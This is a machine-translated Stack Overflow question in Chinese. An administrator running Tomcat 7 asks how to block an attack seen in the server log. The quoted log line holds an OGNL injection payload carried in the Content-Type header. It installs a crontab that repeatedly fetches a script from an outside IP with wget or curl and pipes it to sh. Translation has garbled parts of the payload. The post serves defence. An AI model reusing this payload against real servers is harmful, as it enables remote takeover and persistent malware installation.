2017-10-20 81 views
-2

我注意到tomcatstdout日誌中有人試圖用Tomcat 7和Java 1.6.0.45破解服務器暫時我們阻止了廣泛的ip以避免攻擊,但是在那裏應該是一個更好的方法來阻止這些請求。黑客試圖通過Tomcat 7上的FileUpload發送腳本

有沒有辦法來過濾這種類型的請求?

上的日誌完整的消息是:

GetRequestHTTP:FileUploadException不包含多部分/格式數據或者多部分/混合流的請求,內容類型報頭是%{(#_ ='多部分/表單數據 ')。(#DM = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS)(#_ memberAccess(#_ memberAccess =#分米。):((#容器=#上下文[' com.opensymphony.xwork2.ActionContext.container'] )。(#ognlUtil =#container.getInstance(@ com.opensymphony.xwork2.ognl.OgnlUtil @類))。(#ognlUtil.getExcludedPackageNames()。明確())。(#ognlUtil.getExcludedClasses()。明確() )。(#context.setMemberAccess(#dm))))。(#cmd ='echo「*/20 * * * * wget -O - -q htp://5.188.87.12/icons/logo.jpg | sh \ n */19 * * * * curl http://5.188.87.12/icons/logo.jpg|sh「| crontab - ; wget -O - -q http://5.188.87.12/icons/logo.jpg|sh')。(#iswin =(@ java .lang.System @的getProperty( 'os.name')。toLowerCase()。包含( '贏')))。(#CMDS =(#iswin?{ 'cmd.exe的', '/ C',#CMD} (#p = new java.lang.ProcessBuilder(#cmds))。(#p.redirectErrorStream(true))。(#process = #p.start())。(#ROS =(@ [email protected]()。的getOutputStream()))。(@ [email protected](#process.getInputStream (),#ros))。(#ros.flush())}

+0

Stack Overflow是編程問題的問答網站。你似乎沒有提出具體的問題。有關服務器管理的問題可以在https://serverfault.com –

+0

上得到更好的解答我應該刪除問題嗎? – sirlucas

回答